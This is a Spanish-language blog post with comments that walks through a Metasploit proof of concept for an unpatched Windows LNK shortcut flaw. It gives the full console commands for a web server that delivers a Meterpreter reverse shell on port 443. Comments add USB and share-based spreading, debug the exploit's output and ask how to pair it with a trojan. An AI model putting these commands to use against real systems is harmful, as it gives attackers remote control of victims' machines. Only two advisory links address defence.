MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.
Para testear esta vulnerabilidad primero debemos actualizar el framework con "svn update", y luego hacemos lo siguiente:
Para testear esta vulnerabilidad primero debemos actualizar el framework con "svn update", y luego hacemos lo siguiente:
use windows/browser/ms10_xxx_windows_shell_lnk_execute set SRVHOST 192.168.162.136 set SRVPORT 80 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.162.136 set LPORT 443 exploit
De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!
Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:
Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:
- Microsoft Security Advisory (2286198)
- Security By Default: Solución a la vulnerabilidad "LNK" de Windows mediante Directivas de Restricción de Software
Publicado por Leonardo Pigñer en www.KUNGFOOSION.com
12 comentarios:
Pero creo que existe la posibilidad de copiar los archivos a una usb o a una carpeta compartida y tambien funciona !!! si existe un proxy no funciona como explicas !!! nos veremos en DEFCON el 28 de julio :) alla estare mi correo es tinpardo@gmail.com te invito una cerveza alla :)
Excelente aporte Leo...
falta la manera de copiar los 2 archivos que se generan.
saludos desde mendoza!
Leo, se pueden copiar los archivos abriendo la UNC desde el mismo BT y de ahi copiarlos al PENDRIVE. funciona de mil... con solo ponerlo levanta.
saludos desde mendoza
bruce
Yo estube probando y me sale esto:
Exploit running as background job.
[-] Handler failed to bind to 190.xxx.xxx.xxx:443
[*] Started reverse handler on 0.0.0.0:443
[*]
[*] Send vulnerable clients to \\190.74.55.198\gXhuYKlx\.
[*] Or, get clients to save and render the icon of http:///.lnk
[*]
[-] Exploit exception: Cannot assign requested address - bind(2)
Gracias a todos por sus comentarios, maniana lo pruebo con el USB ;-)
Hola Jeann,
Primero fijate que efectivamente tenes esa IP publica en tu PC, y no que fuera una IP privada nateada.
Luego que no tengas el puerto 80 o 443 utilizado por otra aplicación.
Tambien que solo estes corriendo una instancia de metasploit.
Saludos,
Leonardo
Genial tu blog, claro e interesante... ahora me pongo a molestar con metasploit.
va como loco leito, un placer aprender cosas con Ud. todo funciona, es increible!! ;)
Moises!
va como loco leito, un placer aprender cosas con Ud. todo funciona, es increible!! ;)
Moises!
hola leo :)
una pregunta, cuando uso este exploit me aparece un mensaje raro.
Sending UNC redirect to 192.168.0.10:9586
los ultimos numeros oscilan entre 9586 y 9584
esto a que se debe ?
PD: La url tambien se modifica gracias :)
Hola Dr [F],
Para explotar esta vuln, metasploit te lleva a una especie de recurso compartido de Windows, en donde vas a ver un archivo. LNK y una DLL con el payload. Cuando pasa eso, se deberia ejecutar.
A mi me funciono perfecto en redes LAN, pero en Internet no lo pude hacer funcionar, seguramente a causa de esto del recurso compartido.
Saludos!
me parece q ya no esta disponible este exploit, puede ser?
sera posible juntar este exploit con un troyano y asi se puede alguien seria tan amable de explicarmelo gracias ;)
Publicar un comentario